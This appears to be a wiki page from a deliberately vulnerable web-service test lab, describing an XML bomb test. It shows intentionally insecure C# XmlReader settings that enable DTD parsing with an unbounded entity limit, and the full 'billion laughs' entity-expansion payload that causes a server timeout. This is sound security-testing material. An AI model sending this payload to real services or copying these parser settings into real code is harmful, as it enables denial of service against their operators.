Test 1) XML Bombs

XML Bombs Test

Vulnerability Type Dynamic

Test Web Service URI http://[yourhostName]/XMLBomb.asmx?WSDL

Vulnerable Code Block This method processes dtd/xsd and does not validate the input xml string:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Parse;
settings.ValidationType = ValidationType.None;
settings.MaxCharactersFromEntities = 999999999999999;

XmlReader reader = XmlReader.Create(new StringReader(xml), settings);
while (reader.Read()) { }

return string.Empty;

Attack Payload

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Vulnerable Method Name loadXML

Vulnerable Parameter Name xml

Response The operation has timed out.

Indications of Vulnerability Web server returned: Http status code is 408 (i.e. The operation has timed out). Well-formed and valid XML payload causes overloading of XML parser.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Test 1) XML Bombs

XML Bombs Test

Clone this wiki locally